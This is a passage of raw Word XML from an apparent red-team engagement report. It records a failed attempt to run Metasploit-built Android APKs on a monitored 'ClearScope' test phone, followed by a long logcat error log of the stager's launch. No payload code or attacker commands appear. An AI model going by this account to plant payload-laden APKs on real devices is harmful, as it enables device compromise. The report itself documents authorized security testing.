        <w:t>We intended to use a Metasploit APK to attack ClearScope.  We created multiple variations of APKS with Metasploit built into them.  We were able to use these APKs reliably on our Android 8 Pixel 2 phone; however, we found that the APKs failed to execute on the ClearScope phone.  We’ve included the error log below for the failed test.  As a result of this as well as other issues we were having, we decided to move the third phone off of engagement for testing purposes using a live phone with publishing on BBN’s network.  We had test hosts for all other performers except for ClearScope due to limited hardware and felt it was more important for us to have a test phone during the remaining days of the engagement rather than have 3 phone targets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633598D2" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="84" w:name="_ui9yg58i18sj" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="85" w:name="_Toc12600044"/>
      <w:bookmarkEnd w:id="84"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Targets</w:t>
      </w:r>
      <w:bookmarkStart w:id="86" w:name="_9rf4qvv0k426" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="85"/>
      <w:bookmarkEnd w:id="86"/>
    </w:p>
    <w:p w14:paraId="1A34A82D" w14:textId="5365AA68" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="002911C2">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>ta1-clearscope (test phone, none actually targeted)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712491CC" w14:textId="58796C05" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="87" w:name="_d17xhb2v5vzd" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="88" w:name="_Toc12600045"/>
      <w:bookmarkEnd w:id="87"/>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Capabilities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="88"/>
    </w:p>
    <w:p w14:paraId="22FA3BF1" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00A351B2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>Metasploit APK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCC665A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="89" w:name="_Toc12600046"/>
      <w:r>
        <w:t>Event Log</w:t>
      </w:r>
      <w:bookmarkEnd w:id="89"/>
    </w:p>
    <w:p w14:paraId="057F79D1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:45.837  9478  9478 E libcsblam64: ProgramStart: com.metasploit.stage [257084]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067108B7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:45.838  1508  5090 I ActivityManager: Start proc 9478:com.metasploit.stage/u0a73 for activity com.metasploit.stage/.MainActivity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39681A64" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:45.941  1508  8127 W ActivityManager: Slow operation: 59ms so far, now at attachApplicationLocked: immediately after bindApplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C933DC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:45.942  1508  8127 W ActivityManager: Slow operation: 60ms so far, now at attachApplicationLocked: after updateLruProcessLocked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66D76E57" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:46.173  1508  8127 W ActivityManager: Slow operation: 291ms so far, now at attachApplicationLocked: after mServices.attachApplicationLocked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B0DD43" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:46.175  1508  1529 W zygote64: Long monitor contention with owner Binder:1508_F (8127) at void com.android.server.am.ActivityManagerService.attachApplication(android.app.IApplicationThread, java.lang.TCReturn)(ActivityManagerService.java:7220) waiters=1 in void com.android.server.am.ActivityManagerService.dispatchProcessesChanged(java.lang.TCReturn) for 168ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2925557E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:46.176  5706  5706 I Binder:5706_3: type=1400 audit(0.0:2243): avc: denied { write } for path=003030303032 scontext=u:r:nfc:s0 tcontext=u:r:zygote:s0 tclass=unix_stream_socket permissive=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184D89E2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:46.183  1508  1529 W Looper  : Dispatch took 176ms on android.ui, h=Handler (com.android.server.am.ActivityManagerService$UiHandler) {6b53b0b} cb=null msg=31</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AF6509" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:46.247  9478  9483 I zygote64: Do partial code cache collection, code=30KB, data=25KB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C4047A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:46.248  9478  9483 I zygote64: After code cache collection, code=30KB, data=25KB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AECA00D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:46.248  9478  9483 I zygote64: Increasing code cache capacity to 128KB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C4E392" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:46.278  9478  9478 E java_lang_TC: CS-WARN: Unable to stat file /data/app/com.metasploit.stage-k-n_3VWIzfoJQnKksd0XyA==/lib/arm64 due to errno=ENOENT (No such file or directory)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665B3180" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:46.401  9494  9494 D /vendor/bin/chre: vendor/qcom/proprietary/adsprpc/src/fastrpc_apps_user.c:1038: Error ffffffff: apps_dev_init failed. domain 2, errno Operation not permitted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5386F70E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:46.401  9494  9494 D /vendor/bin/chre: vendor/qcom/proprietary/adsprpc/src/fastrpc_apps_user.c:1113: Error ffffffff: open dev -1 for domain 2 failed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC0C214" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:46.403  9494  9494 D /vendor/bin/chre: vendor/qcom/proprietary/adsprpc/src/fastrpc_apps_user.c:1038: Error ffffffff: apps_dev_init failed. domain 2, errno Operation not permitted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE26BFB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:46.403  9494  9494 D /vendor/bin/chre: vendor/qcom/proprietary/adsprpc/src/fastrpc_apps_user.c:1113: Error ffffffff: open dev -1 for domain 2 failed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055559A0" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:46.403  9494  9494 D /vendor/bin/chre: vendor/qcom/proprietary/adsprpc/src/fastrpc_apps_user.c:571: Error 3b: remote handle invoke failed. domain 2, handle ffffffff, sc 5020000, pra 0x7fedcb0ef8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365BEFA5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:46.403  9494  9494 E CHRE    : Failed to deliver timestamp message from host to CHRE: 59</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00056057" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:46.404  9494  9495 D /vendor/bin/chre: vendor/qcom/proprietary/adsprpc/src/fastrpc_apps_user.c:1038: Error ffffffff: apps_dev_init failed. domain 2, errno Operation not permitted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694DA373" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:46.404  9494  9495 D /vendor/bin/chre: vendor/qcom/proprietary/adsprpc/src/fastrpc_apps_user.c:1113: Error ffffffff: open dev -1 for domain 2 failed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6284554F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:46.406  9494  9494 D /vendor/bin/chre: vendor/qcom/proprietary/adsprpc/src/fastrpc_apps_user.c:1038: Error ffffffff: apps_dev_init failed. domain 2, errno Operation not permitted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C999EF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:46.406  9494  9494 D /vendor/bin/chre: vendor/qcom/proprietary/adsprpc/src/fastrpc_apps_user.c:1113: Error ffffffff: open dev -1 for domain 2 failed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16231E53" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:46.408  9494  9495 D /vendor/bin/chre: vendor/qcom/proprietary/adsprpc/src/fastrpc_apps_user.c:1038: Error ffffffff: apps_dev_init failed. domain 2, errno Operation not permitted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4F07FA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:46.408  9494  9495 D /vendor/bin/chre: vendor/qcom/proprietary/adsprpc/src/fastrpc_apps_user.c:1113: Error ffffffff: open dev -1 for domain 2 failed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF1FA01" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:46.408  9494  9495 D /vendor/bin/chre: vendor/qcom/proprietary/adsprpc/src/fastrpc_apps_user.c:571: Error 3b: remote handle invoke failed. domain 2, handle ffffffff, sc 2000000, pra 0x0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0410DFB2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:46.408  9494  9495 E CHRE    : Failed to initialize reverse monitor on SLPI: 59</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16624F49" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:46.408  9494  9495 D /vendor/bin/chre: vendor/qcom/proprietary/adsprpc/src/fastrpc_apps_user.c:1064: Error 4b: adsp current process handle failed. domain 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54887005" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:46.413  9494  9494 D /vendor/bin/chre: vendor/qcom/proprietary/adsprpc/src/fastrpc_apps_user.c:1038: Error ffffffff: apps_dev_init failed. domain 2, errno Operation not permitted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113E5B1E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:46.413  9494  9494 D /vendor/bin/chre: vendor/qcom/proprietary/adsprpc/src/fastrpc_apps_user.c:1113: Error ffffffff: open dev -1 for domain 2 failed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203A4593" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:46.413  9494  9494 D /vendor/bin/chre: vendor/qcom/proprietary/adsprpc/src/fastrpc_apps_user.c:571: Error 3b: remote handle invoke failed. domain 2, handle ffffffff, sc 0, pra 0x0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768BCA4D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:46.413  9494  9494 E CHRE    : Failed to start CHRE on SLPI: 59</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDCEB20" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:46.495  9478  9496 E libcsblam64: dynamic linker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15350DE8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:46.495  9478  9496 D libEGL  : loaded /vendor/lib64/egl/libEGL_adreno.so</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F634AAF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:46.497  9478  9496 E libcsblam64: dynamic linker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F34E768" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:46.501  9478  9496 I chatty  : uid=10073(com.metasploit.stage) EGL Init identical 297 lines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9E2D5C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:46.501  9478  9496 E libcsblam64: dynamic linker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3F258B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:46.503  9478  9496 D libEGL  : loaded /vendor/lib64/egl/libGLESv1_CM_adreno.so</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579040E7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:46.513  9478  9496 D libEGL  : loaded /vendor/lib64/egl/libGLESv2_adreno.so</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5416BE0D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:46.766  1508  1508 I Binder:1508_F: type=1400 audit(0.0:2244): avc: denied { getattr } for path="/dev/pmsg0" dev="tmpfs" ino=18232 scontext=u:r:system_server:s0 tcontext=u:object_r:pmsg_device:s0 tclass=chr_file permissive=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0785D44A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:46.920  9478  9483 I zygote64: Do partial code cache collection, code=60KB, data=46KB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342DCD03" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:46.920  9478  9483 I zygote64: After code cache collection, code=60KB, data=46KB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1EB36C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:46.920  9478  9483 I zygote64: Increasing code cache capacity to 256KB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D60D14" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:46.930  9478  9497 I zygote64: Deoptimizing void java.lang.TC.sink(int, int, int, java.util.List, int[]) due to JIT inline cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC07FBF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:46.931  9478  9497 I zygote64: Deoptimizing void java.lang.TC.source(int, int, int, java.util.List, int[]) due to JIT inline cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F1A72A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:47.101  1508  5090 W zygote64: Long monitor contention with owner Binder:1508_2 (1521) at void com.android.server.am.ActivityManagerService.activityPaused(android.os.IBinder, java.lang.TCReturn)(ActivityManagerService.java:7442) waiters=0 in void com.android.server.am.ActivityManagerService.serviceDoneExecuting(android.os.IBinder, int, int, int, int, int, int, java.lang.TCReturn) for 169ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A6DBDC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:47.124  1508  1528 W zygote64: Long monitor contention with owner Binder:1508_2 (1521) at void com.android.server.am.ActivityManagerService.activityPaused(android.os.IBinder, java.lang.TCReturn)(ActivityManagerService.java:7442) waiters=4 in void com.android.server.am.ActivityMetricsLogger.checkVisibility(com.android.server.am.TaskRecord, com.android.server.am.ActivityRecord, java.lang.TCReturn) for 148ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4D6C73" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:47.152  1508  5037 E java_lang_TC: CS-WARN: Unable to stat file /data/system_ce/0/snapshots/26.proto due to errno=ENOENT (No such file or directory)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67465656" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:47.155  1508  5037 E java_lang_TC: CS-WARN: Unable to stat file /data/system_ce/0/snapshots/26_reduced.jpg due to errno=ENOENT (No such file or directory)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106B03ED" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:47.170  1508  1529 W Looper  : Dispatch took 216ms on android.ui, h=Handler (com.android.server.am.ActivityManagerService$UiHandler) {6b53b0b} cb=null msg=31</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7482570A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:47.172  1508  5037 E java_lang_TC: CS-WARN: Unable to stat file /data/system_ce/0/snapshots/26.jpg due to errno=ENOENT (No such file or directory)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47520076" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:47.338  9478  9497 E java_lang_TC: CS-WARN: Unable to stat file /data/data/com.metasploit.stage/files/r2s3um.jar due to errno=ENOENT (No such file or directory)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE88303" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:47.339  9478  9478 I Thread-2: type=1400 audit(0.0:2245): avc: denied { write } for name="files" dev="sda45" ino=2491067 scontext=u:r:untrusted_app_25:s0:c512,c768 tcontext=u:object_r:shell_data_file:s0:c512,c768 tclass=dir permissive=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F6E342" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:47.344   789   789 D QCOM PowerHAL: LAUNCH HINT: OFF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B79144B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:47.377  9499  9499 E libcsblam64: ProgramStart: com.metasploit.stage [257614]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0C7FBA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:47.383  6651  6651 I Binder:6651_3: type=1400 audit(0.0:2249): avc: denied { write } for path=003030303032 scontext=u:r:system_app:s0 tcontext=u:r:zygote:s0 tclass=unix_stream_socket permissive=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8CCD6D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:47.401  9499  9499 E linker  : "/system/bin/dex2oat" has the follow exec flag set. injecting libcsblam...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB193AE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:47.442  9499  9499 E libcsblam32: connecting to provmsgr...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007B6630" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>05-13 04:36:47.436  9499  9499 I dex2oat : type=1400 audit(0.0:2250): avc: denied { write } for name="provmsg" dev="tmpfs" ino=8050 scontext=u:r:untrusted_app_25:s0:c512,c768 tcontext=u:object_r:socket_device:s0 tclass=sock_file permissive=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190BE91A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
